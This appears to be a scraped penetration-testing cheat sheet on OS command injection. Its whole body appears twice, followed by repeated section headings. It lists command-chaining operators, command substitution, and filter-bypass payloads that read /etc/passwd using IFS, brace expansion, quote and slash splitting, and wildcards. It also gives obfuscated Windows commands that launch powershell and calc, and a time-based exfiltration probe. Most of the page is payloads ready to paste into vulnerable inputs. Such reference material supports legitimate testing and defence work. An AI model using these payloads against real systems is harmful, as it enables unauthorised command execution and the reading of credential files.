Command Injection

Command Chaining

<input>; ls
<input>& ls
<input>&& ls
<input>| ls
<input>|| ls

Also try:

Prepending a flag or parameter.
Removing spaces (<input>;ls).

Chaining Operators

Windows and Unix supported.

Syntax

Description

%0A

cmd1 %0A cmd2

Newline. Executes both.

;

cmd1 ; cmd2

Semi-colon operator. Executes both.

&

cmd1 & cmd2

Runs command in the background. Executes both.

`cmd1

&&

cmd1 && cmd2

AND operator. Executes cmd2 if cmd1 succeds.

I/O Redirection

> /var/www/html/output.txt
< /etc/passwd

Command Substitution

Replace a command output with the command itself.

<input> `cat /etc/passwd`

<input> $(cat /etc/passwd)

Filter Bypassing

Space filtering

Linux

cat</etc/passwd
# bash
${cat,/etc/passwd}
cat${IFS}/etc/passwd
v=$'cat\x20/etc/passwd'&&$v
IFS=,;`cat<<<cat,/etc/passwd`

Windows

ping%CommonProgramFiles:~10,-18%IP
ping%PROGRAMFILES:~10,-5%IP

Slash (`/`) filtering

echo ${HOME:0:1} # /
cat ${HOME:0:1}etc${HOME:0:1}passwd

echo . | tr '!-0' '"-1' # /
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd

Command filtering

Quotes.

w'h'o'am'i
w"h"o"am"i

Slash.

w\ho\am\i
/\b\i\n/////s\h

At symbol.

who$@ami

Variable expansion.

v=/e00tc/pa00sswd
cat ${v//00/}

Wildcards.

powershell C:\*\*2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc

Time Based Data Exfiltration

time if [ $(uname -a | cut -c1) == L ]; then sleep 5; fi

PreviousFile Inclusion Vulnerabilty NextClient-Side Attacks

Last updated 2 years ago

Was this helpful?

Command Injection

Command Chaining

<input>; ls
<input>& ls
<input>&& ls
<input>| ls
<input>|| ls

Also try:

Prepending a flag or parameter.
Removing spaces (<input>;ls).

Chaining Operators

Windows and Unix supported.

Syntax

Description

%0A

cmd1 %0A cmd2

Newline. Executes both.

;

cmd1 ; cmd2

Semi-colon operator. Executes both.

&

cmd1 & cmd2

Runs command in the background. Executes both.

`cmd1

&&

cmd1 && cmd2

AND operator. Executes cmd2 if cmd1 succeds.

I/O Redirection

> /var/www/html/output.txt
< /etc/passwd

Command Substitution

Replace a command output with the command itself.

<input> `cat /etc/passwd`

<input> $(cat /etc/passwd)

Filter Bypassing

Space filtering

Linux

cat</etc/passwd
# bash
${cat,/etc/passwd}
cat${IFS}/etc/passwd
v=$'cat\x20/etc/passwd'&&$v
IFS=,;`cat<<<cat,/etc/passwd`

Windows

ping%CommonProgramFiles:~10,-18%IP
ping%PROGRAMFILES:~10,-5%IP

Slash (`/`) filtering

echo ${HOME:0:1} # /
cat ${HOME:0:1}etc${HOME:0:1}passwd

echo . | tr '!-0' '"-1' # /
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd

Command filtering

Quotes.

w'h'o'am'i
w"h"o"am"i

Slash.

w\ho\am\i
/\b\i\n/////s\h

At symbol.

who$@ami

Variable expansion.

v=/e00tc/pa00sswd
cat ${v//00/}

Wildcards.

powershell C:\*\*2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc

Time Based Data Exfiltration

time if [ $(uname -a | cut -c1) == L ]; then sleep 5; fi

PreviousFile Inclusion Vulnerabilty NextClient-Side Attacks

Last updated 2 years ago

Was this helpful?

Command Chaining

Chaining Operators

I/O Redirection

Command Substitution

Filter Bypassing

Space filtering

Slash (/) filtering

Command filtering

Time Based Data Exfiltration

Command Chaining

Chaining Operators

I/O Redirection

Command Substitution

Filter Bypassing

Space filtering

Slash (/) filtering

Command filtering

Time Based Data Exfiltration

Slash (`/`) filtering

Slash (`/`) filtering